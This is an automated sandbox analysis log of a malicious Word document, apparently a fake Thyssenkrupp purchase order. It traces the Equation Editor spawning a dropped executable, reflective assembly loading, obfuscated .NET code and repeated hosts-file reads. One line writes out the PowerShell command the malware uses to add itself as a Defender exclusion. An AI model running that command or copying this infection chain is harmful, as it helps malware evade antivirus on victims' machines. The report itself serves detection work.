                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, UYIMtqoPLcKSuPT8Sm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, UYIMtqoPLcKSuPT8Sm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/15@89/9
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yssenkrupp PO040232.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF87.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<..................................s............x....... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......(..........................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......:..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......F..........................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....X..........................s............x.......$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......d..........................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<.......v..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................<..................................s............x...............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Thyssenkrupp PO040232.docReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: Thyssenkrupp PO040232.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Thyssenkrupp PO040232.doc
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                Data Obfuscation

                barindex
                Source: XcsQpLjhNNvxYtrw[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: hgqilegacy20306.exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.cs.Net Code: Y0SUwLXjc4 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.cs.Net Code: Y0SUwLXjc4 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.221582c.3.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.2266ca8.2.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.221ee44.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.22702c0.4.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.hgqilegacy20306.exe.680000.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A7236 push esp; iretd 2_2_002A723D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E000 push ebp; ret 2_2_0029E193
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002AC878 push 00000037h; iretd 2_2_002AC885
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002AC2A0 pushfd ; retn 002Ah2_2_002AC2A1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002AC29A pushfd ; retn 002Ah2_2_002AC29D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002AC362 push 68002AC3h; ret 2_2_002AC36D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ABD4C pushad ; retf 2_2_002ABEB5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E194 push ebp; ret 2_2_0029E193
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029E194 push ebp; ret 2_2_0029E46F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A55DF push esp; iretd 2_2_002A55E1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 5_2_00235FF8 pushad ; retf 5_2_00235FF9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_002521D8 push ebx; iretd 8_2_002521EA
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F90F8 pushfd ; retn 0055h8_2_005F90F9
                Source: XcsQpLjhNNvxYtrw[1].exe.2.drStatic PE information: section name: .text entropy: 7.880526514779496
                Source: hgqilegacy20306.exe.2.drStatic PE information: section name: .text entropy: 7.880526514779496
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, B5htBfs6Eq60LvMyWr.csHigh entropy of concatenated method names: 'w57qscG8RD', 'x7YqmqC8Eh', 'ocGqkZwtlW', 'YEOkZu65Z3', 'WuCkzB7aRn', 'PLdqFVe9nq', 'or2qBxUlFK', 'ECFqWpjDeU', 'mh8qrHFT6u', 'u7gqUiT0Rl'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, bmncYvqpj1lkAkdaQY.csHigh entropy of concatenated method names: 'Dispose', 'IcXBCLO8dK', 'OprWH8BmSy', 'qyxVVUCACc', 'rWyBZKWZOd', 'ca6BzUmIwp', 'ProcessDialogKey', 'bvsWFFNFRT', 'pHJWB2uDHa', 'vNdWWWcIPj'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, Kfn4gOm6qJR5uQnJ51.csHigh entropy of concatenated method names: 'Cev1B8FA1K', 'C0x1rEctfk', 'lt51UPv0iK', 'g8U1sCb5y0', 'UpQ1IT9URT', 'PXW1yMqku4', 'qL41kVLh3p', 'DaaPoI8YYe', 'HXwPiaOwJN', 'kIBPCnQAKB'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cTP0ujQ4unMvfM1Q7j.csHigh entropy of concatenated method names: 'T1tuM2V1Z1', 'tmdu3YGU3n', 'r5juGdGarH', 'fBeuHNSPOs', 'reouhLNGS1', 'Tfuu2pAZ9V', 'OlLuE1IDtm', 'u4wundyhXV', 'LZbufJtWM4', 'qUeupD3qq4'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, pCZRiIVyb8gQ36Jscb.csHigh entropy of concatenated method names: 'Cuaq78BXpo', 'eJfq6HMgjS', 'eoNqwvC5rd', 'n9yqNy8V1U', 'D6pqacncpB', 'L0hqgFOoqt', 'dNsqt7eiIE', 'XZWqMtoxh1', 'kC0q3op3cR', 'mYHqYYn5rP'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cwSp48wlWmdkLMUbRn.csHigh entropy of concatenated method names: 'YEXQiOCpha', 'TaqQZDtBtO', 'DHuPFXYXjy', 'viIPBQ1KGj', 'cX1QpIeU2M', 'P5VQ8MFB9k', 'sU5QLhT4MT', 'yyFQKj8KlP', 'bLLQDB4jdj', 'z3kQ4fxAmt'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, zgULROdx53FtcVdxrb.csHigh entropy of concatenated method names: 'ljHQAuITy9', 'uQMQOvu2MZ', 'ToString', 'aUcQsRUM9K', 'mpVQIWvX1f', 'qFoQm70Zmc', 'mObQyEmfyW', 'hWRQkbnxa3', 'VjFQqVyDSd', 'W3AQvtY0ew'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, UYIMtqoPLcKSuPT8Sm.csHigh entropy of concatenated method names: 'goMIKEWGeg', 'u26IDOFC3S', 'SnuI4VSAbs', 'LY3ITX53PE', 'xDIIxvDqFd', 'UDZIXBCEAA', 'gpGIoKANAZ', 'oGXIijDnAf', 'fn7ICD14NO', 'SnGIZk8esT'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, og6JZM7vcsSTvWXxUG.csHigh entropy of concatenated method names: 'ERRwaHVGW', 'PWUNOYQMo', 'c53gwwlZD', 'TBcta9ZMg', 'gq33w8AIW', 'y8VYB2MGO', 'Q4IiSUo47JKLSEiFBd', 'tMW6m9FUrVTGaqjil8', 'kfvPKDh1i', 'tmveCGFjw'
